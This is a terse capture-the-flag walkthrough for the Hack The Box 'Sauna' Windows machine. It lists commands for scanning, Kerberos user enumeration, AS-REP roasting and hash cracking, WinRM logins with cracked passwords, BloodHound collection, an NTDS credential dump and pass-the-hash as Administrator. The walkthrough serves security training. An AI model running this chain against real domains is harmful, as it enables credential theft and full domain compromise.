Avatar Pwned machines

Sauna

Sauna


Created by Page Difficulty OS
egotisticalSW Hack The Box Easy Windows

nmap -p- --open --min-rate 3000 -vvv -sS -Pn 10.10.10.175 -oG scan
/opt/extractports scan
nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49695 -Pn -sCV 10.10.10.175 -oN ports

image

dig @10.10.10.175 EGOTISTICAL-BANK.LOCAL any

image

image

./username-anarchy -i ../users > usuarios
/opt/kerbrute userenum  --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL /home/rufo/usuarios

image

impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -no-pass -usersfile users
hashcat -m 18200 TGT_fsmith /usr/share/wordlists/rockyou.txt 
netexec winrm 10.10.10.175 -u fsmith -p Thestrokes23
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

image

image

netexec smb 10.10.10.175 -u svc_loanmgr -p Monkeymakestheworldground!
neo4j console
bloodhound &>/dev/null &
netexec ldap 10.10.10.175 -u fsmith -p Thestrokes23 --bloodhound --collection All --dns-server 10.10.10.175

image

netexec smb 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround! --ntds --user Administrator
evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e